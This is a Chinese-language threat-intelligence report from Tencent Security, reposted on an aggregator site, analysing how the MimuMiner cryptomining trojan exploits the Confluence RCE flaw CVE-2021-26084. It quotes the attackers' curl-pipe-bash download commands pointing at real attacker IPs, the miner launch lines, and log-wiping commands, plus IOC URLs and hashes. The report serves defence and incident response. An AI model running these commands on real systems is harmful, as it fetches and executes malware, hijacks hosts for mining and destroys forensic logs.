记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华
«每日攻防资讯简报[Sept.14th]...
对Linux|suid提权的一些总结... »

腾讯云防火墙、云WAF成功防御MimuMiner挖矿木马利用Confluence RCE漏洞的攻击

2021-09-14 21:44
挖矿木马 ,30
僵尸网络 ,20


长按二维码关注

腾讯安全威胁情报中心


一、概述


8月26日,Atlassian官方发布公告,披露了一个Atlassian Confluence远程代码执行漏洞(CVE-2021-26084),攻击者利用漏洞可完全控制服务器。8月31日晚,腾讯云原生安全漏洞检测响应平台通过主机安全(云镜)检测到首个利用该漏洞的在野攻击案例,之后陆续发现至少7个已知网络黑产团伙在利用该漏洞发起的攻击行动。

上周至今,腾讯安全检测到新挖矿木马家族MimuMiner利用Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)进行攻击传播,该家族在入侵成功后会尝试通过SSH连接横向移动。从拦截数据看,攻击量呈明显上升趋势。已部署腾讯T-Sec主机安全专业版、T-Sec Web应用防火墙(WAF)的客户成功防御,保护数千台云主机免于失陷。

技术分析发现,此次利用Atlassian Confluence RCE漏洞攻击的MimuMiner挖矿木马运行时,会清除多个竞品挖矿木马独占系统资源,攻击后会清除系统日志,并通过被控系统已创建的SSH连接进行横向传播。

腾讯安全专家再次提醒所有采用Atlassian Confluence作知识管理和协同应用的政企客户,尽快升级到安全版本以修复漏洞。腾讯安全网络空间测绘数据显示,Atlassian Confluence应用广泛,中国占比为全球最高(21.46%)、其次是美国(21.36%)、德国(18.40%)。

二、详细分析


腾讯云防火墙、腾讯Web应用防火墙(WAF)成功捕获MimuMiner挖矿木马利用CVE-2021-26084漏洞的攻击:


通过漏洞执行远程命令:
curl hxxp://190.144.115.54:443/cn.sh | bashcurl hxxp://165.227.239.108/static.sh | bash

Shell脚本的功能

1.shell脚本首先清除4SHMiner、H2Miner、kwroksminer等挖矿家族的文件和进程。


2.然后下载挖矿木马到/var/tmp/mimu或/tmp/system目录下。


3.接着启动挖矿木马,矿池地址165.227.239.108:3333,均获取当前用户HOSTNAME作为用户名和密码。
/var/tmp/mimu -o 165.227.239.108:3333 -u $HOSTNAME -p $HOSTNAME -k -B --cpu-priority 5 -l /tmp/xlog --randomx-1gb-pages >/dev/null 2>&1    /tmp/system -o 165.227.239.108:3333 -u $HOSTNAME -p $HOSTNAME -k -B --cpu-priority 5 -l /tmp/.ssh/xlog --randomx-1gb-pages >/dev/null 2>&

4.攻击者还会对系统日志进行清除。
echo > /var/log/wtmpecho > /var/log/lastlogecho >   /var/log/utmpcat /dev/null >  /var/log/securecat /dev/null >  /var/log/messagesed  -i '/107.191.63.34/'d  /var/log/messagessed -i 's/107.191.63.34/127.0.0.1/g' secure

5.下载和执行木马保活脚本staticalive.sh。


6.通过SSH连接实现横向移动。


IOCs

MD5

f1a44ecb0ef3089da570f13ea9617518
f20a1eaa94d0e2715811eadd604e30d4


URL

hxxp://190.144.115.54:443/stl.sh
hxxp://190.144.115.54:443/cn.sh
hxxp://190.144.115.54/static.sh
hxxp://190.144.115.54/staticalive.sh
hxxp://165.227.239.108/ldr.sh
hxxp://165.227.239.108/static.c
hxxp://165.227.239.108/stlalive.sh
hxxp://165.227.239.108/static.sh


时间线:

1.2021年8月25日,Atlassian官方发布安全通告,披露了一个Atlassian Confluence 远程代码执行漏洞(CVE-2021-26084),攻击者利用漏洞可以完全控制服务器;
2.2021年8月26日,腾讯安全发布风险通告;
3.2021年8月31日,腾讯安全捕获Atlassian Confluence 远程代码执行漏洞在野利用;
4.2021年9月1日,漏洞poc公开在Github;
5.2021年9月1日晚,腾讯安全检测到多个不同的挖矿木马团伙、僵尸网络团伙利用Atlassian Confluence 远程代码执行漏洞洞攻击云主机;
6.2021年9月2日,腾讯安全检测到利用该漏洞攻击的黑产团伙增加到7个,挖矿家族5个:kwroksminer,iduckminer,h2miner,8220Miner,z0miner;僵尸网络家族2个:mirai,BillGates,腾讯安全全栈安全产品成功保护数千台云主机免于失陷;
7.2021年9月14日,腾讯安全再发报告,披露MimuMinerd挖矿木马家族利用该漏洞在一周左右频繁攻击云主机,腾讯安全再次成功防御,保护数千台云主机未被攻克。


参考连接:
https://mp.weixin.qq.com/s/11c203ejxfb9ZBXtyjEhvg
https://mp.weixin.qq.com/s/X7tPyImyxuyutcrwQADbcQ
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.htm



关于腾讯安全威胁情报中心


腾讯安全威胁情报中心是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托顶尖安全专家团队支撑,帮助安全分析人员、安全运维人员快速、准确地对可疑威胁事件进行预警、处置和溯源分析。

长按二维码关注

腾讯安全威胁情报中心


知识来源: https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247499336&idx=1&sn=b2c1ce3bba63dc4afe35cb1f49aafb26

阅读:525649 | 评论:0 | 标签:防火墙 漏洞 防御 WAF 攻击 木马 腾讯 RCE

想收藏或者和大家分享这篇好文章→复制链接地址

“腾讯云防火墙、云WAF成功防御MimuMiner挖矿木马利用Confluence RCE漏洞的攻击”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

🙇🧎¥由自富财,长成起一↓

随机推荐 🤖

标签云 ☁